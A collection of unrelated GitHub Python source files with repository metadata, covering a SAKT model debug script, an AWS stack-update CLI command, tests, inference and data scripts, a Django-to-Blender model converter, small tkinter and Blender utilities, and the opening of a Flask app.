                # Left-pad short histories with zeros.
                content_id_seq[-seq_len:] = content_id
                answered_correctly_seq[-seq_len:] = answered_correctly
        # Encode history: question id + n_skill when answered correctly.
        # NOTE(review): slices here use [1:]/[2:], whereas SAKTDataset uses
        # [:-1]/[1:] -- confirm the off-by-one is intentional.
        x = content_id_seq[1:].copy()
        x += (answered_correctly_seq[1:] == 1) * self.n_skill
        # Question sequence shifted by one, with the target question appended.
        questions = np.append(content_id_seq[2:], [target_id])
        return x, questions
# %% Loading models
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f'\nUsing device: {device}')
# Fix: MODEL_DIR/DATA_DIR are built with os.path.join and carry no trailing
# separator, so plain '+' concatenation produced broken paths like
# '.../modelsakt_seq_180_auc_0.7689.pth'. Use os.path.join, consistent with
# the rest of this file.
model_file = os.path.join(MODEL_DIR, 'sakt_seq_180_auc_0.7689.pth')
model = SAKTModel(n_skill=NUM_SKILLS,
                  max_seq=MAX_SEQ,
                  embed_dim=EMBED_SIZE,
                  forward_expansion=1,
                  enc_layers=1,
                  heads=NUM_HEADS,
                  dropout=DROPOUT)
n_params = get_num_params(model)
print(f"Current model has {n_params} parameters.")
model = model.to(device)
model.load_state_dict(torch.load(model_file, map_location=device))
#%% Loading mock test set
with timer("Loading private simulated test set"):
    all_test_df = pd.read_parquet(os.path.join(DATA_DIR, 'cv2_valid.parquet'))
    all_test_df = all_test_df[:DEBUG_TEST_SIZE]
    # Keep the ground-truth labels around for scoring the mock run.
    all_test_df['answer_correctly_true'] = all_test_df[TARGET]
# %% mock test
# Prediction batches accumulated across mock-test iterations.
predicted = []

def set_predict(df):
    """Record one batch of predictions for later concatenation."""
    predicted.append(df)
# reload all user group for cv2
# ``group`` maps user_id -> (content_id array, answered_correctly array);
# it is the running history consumed and updated by the mock-test loop.
with timer('loading cv2'):
    with open(os.path.join(DATA_DIR, 'sakt_group_cv2.pickle'), 'rb') as f:
        group = pickle.load(f)
#%%
def iter_env_run(all_test_df, n_iter=1):
    '''
    Running mock test for n_iter iterations using tito's iter_env simulator and cv2_train user group.

    Returns (test_df, output, item, group, prev_group, batch_user_ids) from
    the final iteration so intermediate state can be inspected by the
    debugging cells below.
    '''
    iter_test = Iter_Valid(all_test_df, max_user=1000)
    prev_test_df = None
    prev_group = None
    batch_user_ids = []
    # reload all user group for cv2
    with open(os.path.join(DATA_DIR, 'sakt_group_cv2.pickle'), 'rb') as f:
        group = pickle.load(f)
    for _ in range(n_iter):
        test_df, sample_prediction_df = next(iter_test)
        if prev_test_df is not None:
            # The simulator delivers the previous batch's labels as a
            # stringified list in the current batch.
            # NOTE(review): eval() parses trusted simulator output here, but
            # is brittle; ast.literal_eval would be safer.
            prev_test_df['answered_correctly'] = eval(test_df['prior_group_answers_correct'].iloc[0])
            # Keep questions only (content_type_id == False), then fold the
            # labelled previous batch into each user's stored history.
            prev_test_df = prev_test_df[prev_test_df.content_type_id == False]
            prev_group = prev_test_df[['user_id', 'content_id', 'answered_correctly']]\
                .groupby('user_id').apply(lambda r: (
                    r['content_id'].values,
                    r['answered_correctly'].values))
            for prev_user_id in prev_group.index:
                prev_group_content = prev_group[prev_user_id][0]
                prev_group_answered_correctly = prev_group[prev_user_id][1]
                if prev_user_id in group.index:
                    group[prev_user_id] = (np.append(group[prev_user_id][0], prev_group_content),
                                           np.append(group[prev_user_id][1], prev_group_answered_correctly))
                else:
                    group[prev_user_id] = (prev_group_content, prev_group_answered_correctly)
                # Cap each stored history at the model's window length.
                if len(group[prev_user_id][0]) > MAX_SEQ:
                    new_group_content = group[prev_user_id][0][-MAX_SEQ:]
                    new_group_answered_correctly = group[prev_user_id][1][-MAX_SEQ:]
                    group[prev_user_id] = (new_group_content, new_group_answered_correctly)
        prev_test_df = test_df.copy()
        test_df = test_df[test_df.content_type_id == False]
        batch_user_ids.append(test_df.user_id.unique())
        # Score the whole batch in a single forward pass.
        test_dataset = TestDataset(group, test_df, NUM_SKILLS, max_seq=MAX_SEQ)
        test_dataloader = DataLoader(test_dataset, batch_size=len(test_df), shuffle=False)
        item = next(iter(test_dataloader))
        x = item[0].to(device).long()
        target_id = item[1].to(device).long()
        with torch.no_grad():
            output, _ = model(x, target_id)
        output = torch.sigmoid(output)
        # Only the last position corresponds to the question being asked now.
        preds = output[:, -1]
        test_df['answered_correctly'] = preds.cpu().numpy()
        set_predict(test_df.loc[test_df['content_type_id'] == 0,
                                ['row_id', 'answered_correctly']])
    return test_df, output, item, group, prev_group, batch_user_ids
# %%
# user_common = set(batch_user_ids[0])
# for k in range(1, len(batch_user_ids)):
#     user_common = user_common.intersection(set(batch_user_ids[k]))
# %%
'''
Current set up, cv2_valid first 25k rows
first 4 batches common user_id: 143316232, 1089397940, 1140583044 (placeholder user?)
'''
# Sanity-check one user that appears in the first few mock-test batches.
print(group[1089397940])
#%% iter number 1
# Run the simulator for 1, 2 and 3 iterations and inspect how the tracked
# user's model inputs, predictions and stored history evolve.
test_df, output, item, group_updated, _, _ = iter_env_run(all_test_df, n_iter=1)
u_idx_loc = test_df.index.get_loc(test_df[test_df.user_id==1089397940].index[0])
print(f"local index of user 1089397940: {u_idx_loc}", '\n')
print(test_df.iloc[u_idx_loc], '\n')
print(item[1][u_idx_loc, -12:]) # user 1089397940 first batch in example_test (question sequence)
print(item[0][u_idx_loc, -12:]) # user 1089397940 first batch in example_test: skill sequence = prev_content_id * (correct or not) + 13523
print(output[u_idx_loc, -12:].cpu().numpy(),'\n') # user 1089397940 probability prediction
print(group_updated[1089397940][0][:12]) # in the first iteration the length is only 11
print(group_updated[1089397940][1][:12])
#%% iter number 2
test_df, output, item, group_updated, _, _ = iter_env_run(all_test_df, n_iter=2)
u_idx_loc = test_df.index.get_loc(test_df[test_df.user_id==1089397940].index[0])
print(f"local index of user 1089397940: {u_idx_loc}", '\n')
print(test_df.iloc[u_idx_loc], '\n')
print(item[1][u_idx_loc, -12:]) # user 1089397940 2nd batch in example_test (question sequence)
print(item[0][u_idx_loc, -12:]) # user 1089397940 2nd batch in example_test: skill sequence = prev_content_id * (correct or not) + 13523
print(output[u_idx_loc, -12:].cpu().numpy(),'\n') # user 1089397940 probability prediction
print(group_updated[1089397940][0][:12]) # in the 2nd iteration the length is only 11
print(group_updated[1089397940][1][:12])
# %%
test_df, output, item, group_updated, _, _ = iter_env_run(all_test_df, n_iter=3)
u_idx_loc = test_df.index.get_loc(test_df[test_df.user_id==1089397940].index[0])
print(f"local index of user 1089397940: {u_idx_loc}", '\n')
print(test_df.iloc[u_idx_loc], '\n')
print(item[1][u_idx_loc, -12:]) # user 1089397940 3rd batch in example_test (question sequence)
print(item[0][u_idx_loc, -12:]) # user 1089397940 3rd batch in example_test: skill sequence = prev_content_id * (correct or not) + 13523
print(output[u_idx_loc, -12:].cpu().numpy(),'\n') # user 1089397940 probability prediction
print(group_updated[1089397940][0][:12]) # in the 3rd iteration the length is only 11
print(group_updated[1089397940][1][:12])
# %%
| scaomath/kaggle-riiid-test | sakt/debug_sakt_2.py | debug_sakt_2.py | py | 20,260 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "seaborn.set",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "seaborn.set_context",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_n... |
30201145239 | from uuid import uuid1
import click
from awsscripter.stack.helpers import catch_exceptions, confirmation
from awsscripter.stack.helpers import simplify_change_set_description
from awsscripter.stack.helpers import write, get_stack_or_env
from awsscripter.stack.stack_status import StackStatus, StackChangeSetStatus
@click.command(name="update")
@click.argument("path")
@click.option(
    "-c", "--change-set", is_flag=True,
    help="Create a change set before updating."
)
@click.option(
    "-v", "--verbose", is_flag=True, help="Display verbose output."
)
@click.option(
    "-y", "--yes", is_flag=True, help="Assume yes to all questions."
)
@click.pass_context
@catch_exceptions
def update_command(ctx, path, change_set, verbose, yes):
    """
    Update a stack.

    Updates a stack for a given config PATH. Or perform an update via
    change-set when the change-set flag is set. Exits with status 1 when
    the change set cannot be created or the direct update does not
    complete.
    """
    stack, _ = get_stack_or_env(ctx, path)
    if change_set:
        # uuid1 gives a unique, sortable change-set name per invocation.
        change_set_name = "-".join(["change-set", uuid1().hex])
        stack.create_change_set(change_set_name)
        try:
            # Wait for change set to be created
            status = stack.wait_for_cs_completion(change_set_name)
            # Exit if change set fails to create
            if status != StackChangeSetStatus.READY:
                exit(1)
            # Describe changes
            description = stack.describe_change_set(change_set_name)
            if not verbose:
                description = simplify_change_set_description(description)
            write(description, ctx.obj["output_format"])
            # Execute change set if happy with changes
            if yes or click.confirm("Proceed with stack update?"):
                stack.execute_change_set(change_set_name)
        finally:
            # Clean up by deleting change set
            stack.delete_change_set(change_set_name)
    else:
        # Direct update path: ask for confirmation unless --yes was given.
        confirmation("update", yes, stack=path)
        response = stack.update()
        if response != StackStatus.COMPLETE:
            exit(1)
| xformation/awsscripter | awsscripter/cli/stack/update.py | update.py | py | 2,044 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "awsscripter.stack.helpers.get_stack_or_env",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "uuid.uuid1",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "awsscripter.stack.stack_status.StackChangeSetStatus.READY",
"line_number": 42,
"usa... |
17940251781 | from sklearn.linear_model import LogisticRegression
import numpy as np
def logistic(train_feature_dir, train_label_dir, test_feature_dir, test_label_dir):
    """Train logistic regression on saved features and score the test set.

    All four arguments are paths to ``.npy`` files. Features are flattened to
    one 3584-dimensional vector per sample.

    Returns:
        (scores, test_label): positive-class probabilities for the test
        samples (``numpy`` array) and the test labels as loaded from disk.
    """
    train_feature = np.load(train_feature_dir)
    train_label = np.load(train_label_dir)
    test_feature = np.load(test_feature_dir)
    test_label = np.load(test_label_dir)
    # Flatten each sample directly to a (n_samples, 3584) design matrix,
    # replacing the original 4-D reshape followed by per-row copy loops.
    train_feature = np.reshape(train_feature, (len(train_feature), 3584))
    test_feature = np.reshape(test_feature, (len(test_feature), 3584))
    lr = LogisticRegression(C=1000.0, random_state=0)  # use the default solver settings
    lr.fit(train_feature, train_label)
    # Column 1 of predict_proba is the positive class (classes_ are sorted).
    pre_label = lr.predict_proba(test_feature)[:, 1]
    return np.array(pre_label), test_label
| jingmouren/antifraud | antifraud/methods/LR.py | LR.py | py | 1,063 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 10,
... |
43242806041 | from preggy import expect
from tornado.testing import gen_test
from tests.base import TestCase
from thumbor.config import Config
from thumbor.context import Context
from thumbor.importer import Importer
class HealthcheckHandlerTestCase(TestCase):
    """Integration tests for the default /healthcheck route."""

    @gen_test
    async def test_can_get_healthcheck(self):
        # GET must answer 200 with body "WORKING" and forbid proxy caching.
        response = await self.async_get("/healthcheck")
        expect(response.code).to_equal(200)
        expect(response.body).to_equal("WORKING")
        expect(response.headers.get("Cache-Control")).to_equal("no-cache")

    @gen_test
    async def test_can_head_healthcheck(self):
        # HEAD has no body, so only the status code and cache header are checked.
        response = await self.async_fetch("/healthcheck", method="HEAD")
        expect(response.code).to_equal(200)
        expect(response.headers.get("Cache-Control")).to_equal("no-cache")
# Same test, but configured for the root URL
class HealthcheckOnRootTestCase(TestCase):
    """Same healthcheck assertions, but with the route configured at '/'."""

    def get_context(self):
        # Override the test context so HEALTHCHECK_ROUTE points at the root URL.
        cfg = Config()
        cfg.HEALTHCHECK_ROUTE = "/"
        importer = Importer(cfg)
        importer.import_modules()
        return Context(None, cfg, importer)

    @gen_test
    async def test_can_get_healthcheck(self):
        response = await self.async_get("/")
        expect(response.code).to_equal(200)
        expect(response.body).to_equal("WORKING")

    @gen_test
    async def test_can_head_healthcheck(self):
        response = await self.async_fetch("/", method="HEAD")
        expect(response.code).to_equal(200)
| thumbor/thumbor | tests/handlers/test_healthcheck.py | test_healthcheck.py | py | 1,446 | python | en | code | 9,707 | github-code | 6 | [
{
"api_name": "tests.base.TestCase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "preggy.expect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "preggy.expect",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "preggy.expect",
"... |
15892112680 | from argparse import ArgumentParser
import os
import logging
from sys import stdin, stdout
import yaml
import gc
import torch
from probing.inference import Inference
class NotAnExperimentDir(ValueError):
    """Raised when a directory lacks the config.yaml that marks an experiment dir."""
    pass
def find_last_model(experiment_dir):
    """Return the path of the most recent model checkpoint in *experiment_dir*.

    A plain ``model`` file wins outright; otherwise the ``model.epoch_N``
    file with the largest N is chosen.
    """
    plain_path = os.path.join(experiment_dir, 'model')
    if os.path.exists(plain_path):
        return plain_path
    epoch_files = [name for name in os.listdir(experiment_dir)
                   if name.startswith('model.epoch_')]
    newest = max(epoch_files, key=lambda name: int(name.split("_")[-1]))
    return os.path.join(experiment_dir, newest)
def find_in_out_file_name(experiment_dir, prefix='test'):
    """Derive the (input, output, accuracy) paths for *prefix* ('test' or 'dev').

    The input path is taken from the experiment's config.yaml ``train_file``
    with its ``/train`` component swapped for the prefix; output and accuracy
    files live inside the experiment directory.  Raises NotAnExperimentDir
    when config.yaml is missing.
    """
    config_path = os.path.join(experiment_dir, 'config.yaml')
    if not os.path.exists(config_path):
        raise NotAnExperimentDir(f"{config_path} does not exist")
    with open(config_path) as config_file:
        config = yaml.load(config_file, Loader=yaml.FullLoader)
    input_file = config['train_file'].replace('/train', f'/{prefix}')
    output_file = os.path.join(experiment_dir, f'{prefix}.out')
    accuracy_file = os.path.join(experiment_dir, f'{prefix}.word_accuracy')
    return input_file, output_file, accuracy_file
def skip_dir(experiment_dir, test_out):
    """Return True when *test_out* already exists and is newer than the
    latest model checkpoint, i.e. inference does not need to be re-run."""
    if os.path.exists(test_out):
        checkpoint_mtime = os.path.getmtime(find_last_model(experiment_dir))
        return checkpoint_mtime < os.path.getmtime(test_out)
    return False
def compute_accuracy(reference, prediction):
    """Compute label accuracy between a reference and a prediction file.

    Both files are tab-separated with the label in the last column; blank
    lines present in both files (sentence separators) are skipped.  If the
    prediction file is shorter than the reference, an error is logged and
    the accuracy over the lines scored so far is returned.

    Returns 0.0 when no scorable lines exist (previously this raised
    ZeroDivisionError on empty input).
    """
    acc = 0
    samples = 0
    with open(reference) as r, open(prediction) as p:
        for rline in r:
            try:
                pline = next(p)
            except StopIteration:
                logging.error(f"Prediction file {prediction} shorter "
                              f"than reference {reference}")
                # Partial accuracy over what was scored; 0.0 if nothing was.
                return acc / samples if samples else 0.0
            if not rline.strip() and not pline.strip():
                continue
            rlabel = rline.rstrip("\n").split("\t")[-1]
            plabel = pline.rstrip("\n").split("\t")[-1]
            acc += (rlabel == plabel)
            samples += 1
    return acc / samples if samples else 0.0
def parse_args(argv=None):
    """Parse command-line arguments.

    Args:
        argv: optional list of argument strings; defaults to ``sys.argv[1:]``.
            Accepting an explicit list keeps the parser unit-testable while
            remaining backward compatible with the zero-argument call.
    """
    p = ArgumentParser()
    p.add_argument("experiment_dirs", nargs="+", type=str,
                   help="Experiment directory")
    p.add_argument("--run-on-dev", action="store_true")
    p.add_argument("--run-on-test", action="store_true")
    p.add_argument("--max-samples", default=None, type=int)
    return p.parse_args(argv)
def main():
    """Run inference for every experiment directory given on the command line.

    For each directory (skipping non-directories and ones without a
    config.yaml), optionally runs test and/or dev inference, writes the
    predictions to <prefix>.out, computes accuracy against the gold file and
    stores it in <prefix>.word_accuracy.  Directories whose output file is
    already newer than the latest checkpoint are skipped (see skip_dir).
    """
    args = parse_args()
    for experiment_dir in args.experiment_dirs:
        if not os.path.isdir(experiment_dir):
            logging.info(f"{experiment_dir} not directory, skipping")
            continue
        if args.run_on_test:
            try:
                test_in, test_out, test_acc = find_in_out_file_name(experiment_dir, 'test')
                if not skip_dir(experiment_dir, test_out):
                    logging.info(f"Running inference on {experiment_dir}")
                    inf = Inference(experiment_dir, test_in, max_samples=args.max_samples)
                    with open(test_out, 'w') as f:
                        inf.run_and_print(f)
                    acc = compute_accuracy(test_in, test_out)
                    logging.info(f"{experiment_dir} test acc: {acc}")
                    with open(test_acc, 'w') as f:
                        f.write(f"{acc}\n")
                    # Release model memory between experiments.
                    gc.collect()
                    torch.cuda.empty_cache()
            except NotAnExperimentDir:
                logging.info(f"{experiment_dir}: no config.yaml, skipping")
        if args.run_on_dev:
            try:
                dev_in, dev_out, dev_acc = find_in_out_file_name(experiment_dir, 'dev')
                if not skip_dir(experiment_dir, dev_out):
                    inf = Inference(experiment_dir, dev_in, max_samples=args.max_samples)
                    with open(dev_out, 'w') as f:
                        inf.run_and_print(f)
                    acc = compute_accuracy(dev_in, dev_out)
                    logging.info(f"{experiment_dir} dev acc: {acc}")
                    with open(dev_acc, 'w') as f:
                        f.write(f"{acc}\n")
                    gc.collect()
                    torch.cuda.empty_cache()
            except NotAnExperimentDir:
                logging.info(f"{experiment_dir}: no config.yaml, skipping")
if __name__ == '__main__':
    # Configure root logging once at script entry, then run the batch loop.
    log_fmt = '%(asctime)s - %(levelname)s - %(message)s'
    logging.basicConfig(level=logging.INFO, format=log_fmt)
    main()
| juditacs/probing | src/probing/batch_inference.py | batch_inference.py | py | 4,385 | python | en | code | 3 | github-code | 6 | [
{
"api_name": "os.path.join",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number":... |
41465348149 | from commands import *
from pyfiglet import Figlet
from datetime import timedelta
fterm = f = Figlet(font="term", justify="center", width=Console.width())
# fonts = Str.nl(File.read("pyfiglet_fonts.txt").strip())
def now():
    """Current wall-clock time via the star-imported commands.Time wrapper."""
    return Time.datetime()
# Each CLI argument is an end time (e.g. "18:30"); collect them all.
# NOTE(review): OS.args presumably wraps sys.argv (star-imported from
# 'commands') -- confirm.
ends = []
for arg in OS.args[1:]:
    ends.append(arg)
if not ends:
    print("No times given, exit")
    # NOTE(review): the message says "exit" but the script does not actually
    # terminate here; execution continues with an empty list.
endtimes = []
last_endtime = Time.datetime(year=1970)
for end in ends:
    # Extract the hour/minute digits from the argument (separator-agnostic).
    end = Str.get_integers(end)
    new_endtime = Time.datetime(hour = end[0], minute = end[1], second = 0)
    # Keep the sequence monotonically increasing: any time earlier than the
    # previous one is pushed forward by whole days.
    while True:
        if new_endtime < last_endtime:
            new_endtime = new_endtime + timedelta(days=1)
        else:
            break
    endtimes.append(new_endtime)
    last_endtime = new_endtime
#debug
# for endtime in endtimes:
#     print(endtime)
#debug END
endtimes.sort()
#debug
# print()
# for endtime in endtimes:
# print(endtime)
#debug END
# cnt = Json("time_until_cnt.json")
# if not isinstance(cnt.string, int):
# cnt.string = 0
while True:
Console.clean()
rebuild = True
for endtime in endtimes:
time = now()
# Print.debug(f"{endtime=}")
# Print.debug(f"{time=}")
if endtime < time:
continue
rebuild = False
seconds = int((endtime-time).total_seconds())
# Print.debug(f"{seconds=}")
human_readable = Time.human_readable(seconds)
# Print.debug(f"{human_readable=}")
# font = Random.item(fonts)
# try:
# font = fonts[cnt.string]
# except IndexError:
# cnt.string = 0
# font = fonts[cnt.string]
# font = "minecraft"
font = "minecraft_condenced"
# cnt.string += 1
# cnt.save()
# print(fterm.renderText(f"{font} {cnt.string}/{len(fonts)}"))
# print(fterm.renderText(f"{font}"))
f = Figlet(font=font, justify="center", width=Console.width())
until = f"{endtime.hour:02}:{endtime.minute:02}"
if endtime.day != time.day:
until = f"{endtime.day:02}.{endtime.month:02} {until}"
print(f.renderText(f"{human_readable} until {until}").rstrip())
# if seconds <= 0:
# Console.blink()
# break
if rebuild:
for cnt, endtime in enumerate(endtimes):
endtimes[cnt] = endtime + Time.delta(24*3600)
# OS.exit(1)
Time.sleep(1)
| egigoka/test | time_until.py | time_until.py | py | 2,474 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "pyfiglet.Figlet",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "pyfiglet.Figlet",
"line_number": 92,
"usage_type": "call"
}
] |
811951116 | # Top View of Binary Tree
# Given a pointer to the root of a binary tree, print the top view of the binary tree.
# The tree as seen from the top the nodes, is called the top view of the tree.
# For example :
# 1
# \
# 2
# \
# 5
# / \
# 3 6
# \
# 4
# Top View : 1 2 5 6
from collections import deque
def topView(root):
    """Print the top view of a binary tree as space-separated node values.

    Breadth-first traversal tracking each node's horizontal distance from
    the root; the first node encountered at each distance is the one visible
    from above.  Output is ordered left to right (ascending distance).
    """
    first_at_distance = {}
    queue = deque([(root, 0)])
    while queue:
        node, dist = queue.popleft()
        if not node:
            continue
        # BFS guarantees the first node seen per distance is the topmost.
        if dist not in first_at_distance:
            first_at_distance[dist] = node.info
        if node.left:
            queue.append((node.left, dist - 1))
        if node.right:
            queue.append((node.right, dist + 1))
    for dist in sorted(first_at_distance):
        print(first_at_distance[dist], end=" ")
{
"api_name": "collections.deque",
"line_number": 23,
"usage_type": "call"
}
] |
71168709947 | import os
import subprocess
from django.conf import settings
from django.utils.dateparse import parse_date
from rest_framework import status
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.generics import ListCreateAPIView, RetrieveDestroyAPIView
from .models import ConvertedModel
from .serializers import ConvertedModelSerializer
class ConvertedModelListCreateView(ListCreateAPIView):
    """List the authenticated user's converted models and accept new uploads
    (uploads are converted to .glb via a headless Blender subprocess)."""
    serializer_class = ConvertedModelSerializer
    permission_classes = [IsAuthenticated]
    pagination_class = LimitOffsetPagination

    def get_queryset(self):
        # Only the requesting user's records, optionally filtered by the
        # start_date / end_date query parameters (ISO dates).
        queryset = ConvertedModel.objects.filter(user=self.request.user)
        start_date = self.request.query_params.get('start_date')
        end_date = self.request.query_params.get('end_date')
        if start_date:
            start_date = parse_date(start_date)
            queryset = queryset.filter(timestamp__gte=start_date)
        if end_date:
            end_date = parse_date(end_date)
            queryset = queryset.filter(timestamp__lte=end_date)
        return queryset

    def perform_create(self, serializer):
        # NOTE(review): DRF ignores the return value of perform_create, so
        # the Response objects returned below never reach the client --
        # consider raising ValidationError/APIException instead.
        original_file = self.request.FILES.get('original_file')
        if not original_file:
            return Response("No file provided", status=status.HTTP_400_BAD_REQUEST)
        # Creating the model instance directly stores the file in its
        # configured upload location.
        converted_model = ConvertedModel.objects.create(
            user=self.request.user,
            original_file=original_file
        )
        # Absolute filesystem path of the stored upload.
        original_file_path = converted_model.original_file.path
        try:
            # Convert the file with headless Blender.
            converted_files_dir = os.path.join(settings.MEDIA_ROOT, 'converted_files')
            os.makedirs(converted_files_dir, exist_ok=True)
            output_file_name = os.path.splitext(original_file.name)[0] + '.glb'
            output_file_path = os.path.join(converted_files_dir, output_file_name)
            blender_executable = "blender"
            blender_script = os.path.join('fileconverter', 'blender_script.py')
            try:
                subprocess.run([blender_executable, "--background", "--python", blender_script, original_file_path,
                                output_file_path], check=True)
            except subprocess.CalledProcessError:
                # NOTE(review): conversion failure is swallowed here; the
                # existence check below is the only failure signal.
                print(f"...")
            if not os.path.exists(output_file_path):
                raise Exception(f"Converted file not found: {output_file_path}")
            # Attach the converted file to the model instance.
            converted_model.converted_file = 'converted_files/' + output_file_name
            converted_model.converted_filename = output_file_name
            converted_model.save()
        except Exception as e:
            converted_model.delete()  # remove the record on failed conversion
            return Response(str(e), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
        serializer.instance = converted_model
class ConvertedModelDetailView(RetrieveDestroyAPIView):
    """Retrieve or delete a single converted model owned by the requester."""
    queryset = ConvertedModel.objects.all()
    serializer_class = ConvertedModelSerializer
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        # Ownership check: only the requesting user's objects are reachable.
        return self.queryset.filter(user=self.request.user)
| maxcrimea/ARSY | web/fileconverter/views.py | views.py | py | 3,589 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "rest_framework.generics.ListCreateAPIView",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "serializers.ConvertedModelSerializer",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "rest_framework.permissions.IsAuthenticated",
"line_number": 18... |
8400225965 | # Importamos tkinter
from tkinter import *
# Cargamos el modulo de Imagenes Pillow Python
from PIL import Image, ImageTk
# Creamos la ventana raiz
# Root window setup: fixed 700x500 size, course-demo title.
ventana = Tk()
ventana.title("Imagenes | Curso de master en Python")
ventana.geometry("700x500")
# Greeting label, centered.
Label(ventana, text="Hola!!, Soy Lcdo. José Fernando Frugone Jaramillo").pack(anchor=CENTER)
# Load the JPEG with Pillow and wrap it in a Tk-compatible PhotoImage.
# NOTE: 'render' must stay referenced (module scope) or Tk loses the image
# to garbage collection before it is drawn.
dibujo = Image.open("./21-tkinter/imagenes/leon.jpg")
render = ImageTk.PhotoImage(dibujo)
Label(ventana, image=render).pack(anchor=CENTER)
# Enter the Tk event loop (blocks until the window is closed).
ventana.mainloop()
| jfrugone1970/tkinter_python2020 | 21-tkinter/03-imagenes.py | 03-imagenes.py | py | 500 | python | es | code | 1 | github-code | 6 | [
{
"api_name": "PIL.Image.open",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "PIL.ImageTk.PhotoImage",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "PIL.ImageTk",
"li... |
74221859388 | # Thanks to Ethan (@sherbondy) for the awesome idea of using CSG!
# Much slower than the other version, but it uses like 1/3 of the geometry
# Refactored version. slightly slower but more readable.
import bpy
import mathutils
bpy.ops.object.select_all(action='DESELECT')
pos = bpy.context.scene.cursor_location
bpy.ops.mesh.primitive_cube_add(view_align=False, enter_editmode=False)
iterator = bpy.context.active_object
iterator.name = 'Iterator'
bpy.ops.mesh.primitive_cube_add(view_align=False, enter_editmode=False)
menger = bpy.context.active_object
menger.name = 'MengerSponge'
def apply_modifier():
    # Add a boolean DIFFERENCE modifier that subtracts the 'Iterator' object
    # from the currently active object, then bake the result into mesh data.
    bpy.ops.object.modifier_add(type='BOOLEAN')
    bpy.context.object.modifiers["Boolean"].operation = 'DIFFERENCE'
    bpy.context.object.modifiers["Boolean"].object = bpy.data.objects["Iterator"]
    bpy.ops.object.modifier_apply(apply_as='DATA', modifier="Boolean")
max_depth = 3
def cycle(array):
    """Return a new list equal to *array* rotated left by one position."""
    items = list(array)
    return items[1:] + items[:1]
# Carve the sponge: at each depth the 'iterator' cuboid is scaled to
# 1/3^(depth+1) in two axes (1.01 in the third so it pierces the whole cube)
# and positioned over every cell of a 3^depth x 3^depth grid; cycling
# scale/location three times repeats the cut with the axis roles rotated.
# NOTE(review): apply_modifier acts on the active object -- presumably the
# 'MengerSponge' cube created last; confirm selection state before running.
for depth in range (max_depth):
    for i in range(3**depth):
        for j in range(3**depth):
            scale = [1.01, 1/3**(depth+1), 1/3**(depth+1)]
            location = [0, -1+1/3**depth+2*i/3**depth, -1+1/3**depth+2*j/3**depth]
            for k in range(3):
                iterator.scale = scale
                iterator.location = pos + mathutils.Vector(location)
                apply_modifier()
                # Rotate axis roles so the next pass cuts along another axis.
                scale = cycle(scale)
                location = cycle(location)
# Remove the helper cuboid and leave the sponge selected.
bpy.ops.object.select_all(action='DESELECT')
iterator.select = True
bpy.ops.object.delete()
menger.select = True
{
"api_name": "bpy.ops.object.select_all",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bpy.ops",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "bpy.context",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "bpy.ops.mesh.pr... |
20445647795 | import os
import importlib.util
import time
print("Checking Dependencies")
if importlib.util.find_spec("tkinter") is None:
print("tkinter NOT INSTALLED,RUN pip install tkinter")
os.system("pause")
exit()
print("Dependencies OK")
time.sleep(5.5)
from os import path
from tkinter import filedialog
from tkinter import *
root = Tk()
root.withdraw()
print("Select Source Folder")
Source_Path = filedialog.askdirectory()
print("Source Path : ",Source_Path)
print("Select Destination Path")
Destination = filedialog.askdirectory()
print("Destination Path : ",Destination)
fileprfx = input("File Prefix :")
filetype = input("File Type (ex .doc .exe .png) :")
def main():
    """Rename every file from Source_Path into Destination sequentially.

    Each entry becomes '<fileprfx> <index><filetype>' using the globals
    gathered from the prompts above; os.rename also moves the file into the
    destination folder.
    """
    for index, entry in enumerate(os.listdir(Source_Path)):
        new_name = f"{fileprfx} {index}{filetype}"
        os.rename(os.path.join(Source_Path, entry), os.path.join(Destination, new_name))
# Driver Code
if __name__ == '__main__':
main() | JohnavonVincentius/FileRename | filerename.py | filerename.py | py | 1,010 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "importlib.util.util.find_spec",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "importlib.util.util",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "importlib.util",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "os... |
18425266806 | # from flask import Flask
from flask import Flask, render_template, request, redirect, url_for, session
import pymysql.cursors
import json
import pickle
from flask import jsonify
import sklearn
from flask_sqlalchemy import model
# Loading in the training models that we will be using later
# Unpickle the pre-trained availability models used by the prediction routes.
# NOTE(review): the file handles passed to pickle.load are never closed.
bike_model = pickle.load(open('bikes_model.pkl', 'rb'))
stands_model = pickle.load(open('stands_model.pkl','rb'))
app = Flask(__name__)
# MySQL configuration
